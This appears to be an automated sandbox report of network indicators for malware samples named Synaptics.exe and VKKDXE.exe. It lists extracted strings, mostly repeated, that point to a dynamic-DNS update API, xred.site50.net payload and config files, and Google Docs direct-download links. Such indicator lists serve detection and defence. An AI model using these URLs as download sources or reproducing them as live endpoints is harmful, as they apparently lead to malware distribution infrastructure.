Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7tACsKoHSmUnK9qsLTHzIVFAC4mZwKh67VYHSLu-8TBFbRHGLw2kRhsI8oTIGFgYoVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:54 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-sWkMruUEWsu5r6upg0lomA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hZy2zz7UywB6WmewDgtHePl-w2LXLfJPbGrKRjafGL1D0cwtXeZZVz5wOzeh49hZGzCz4sIgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:54 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-mOCILUZAmKX3c8pjizURcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: Synaptics.exe.0.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978j
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978l
Source: ._cache_VKKDXE.exe, 00000003.00000002.2530624721.0000000001194000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-score.com/checkip/
Source: Amcache.hve.28.dr	String found in binary or memory: http://upx.sf.net
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl8
Source: Synaptics.exe.0.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: Synaptics.exe.0.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini07
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: Synaptics.exe.0.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/0
Source: Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/8
Source: Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/GR
Source: Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/O
Source: Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/S
Source: Synaptics.exe, 00000006.00000002.1650418516.0000000000578000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/VU
Source: Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/XO
Source: Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/google.com/
Source: Synaptics.exe, 00000006.00000002.1674657710.000000000D4FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1681694810.000000001023E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0;
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: Synaptics.exe.0.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsO
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1680240837.000000000F5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1661093887.00000000062AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1682667371.0000000010C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1680156960.000000000F47E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437395638.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1681200411.000000000FE7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1675083651.000000000DB3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1680953213.000000000FABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1661228580.00000000063EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1680356949.000000000F6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1674295239.000000000D27E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1679432660.000000000ECFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1666751267.000000000787E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1686181488.000000001287E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1689277002.000000001327E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1686696263.0000000012C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1679626415.000000000EE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1661978424.0000000006B2E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
Source: Synaptics.exe, 00000006.00000003.1367538076.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#Q
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.000000000572D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$-K
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$r
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&-
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&e
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(ki
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.000000000572D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)-
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.csV
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.n
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-measw
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.bdn.
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com4W
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com5
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.comK
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gl
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goo
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gst7=
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net.
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.u
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.uk
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
Source: Synaptics.exe, 00000006.00000003.1368345628.00000000056AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/7B
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/I
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/v
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0-
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download14
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1:25
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1H
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
Source: Synaptics.exe, 00000006.00000003.1367538076.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3P
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4125Z0#1
Source: Synaptics.exe, 00000006.00000003.1368345628.00000000056AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download47W
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4I
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4Z
Source: Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4urement-
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5/
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5pnxk
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6u
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6z3
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7G
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005701000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7S
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8#
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
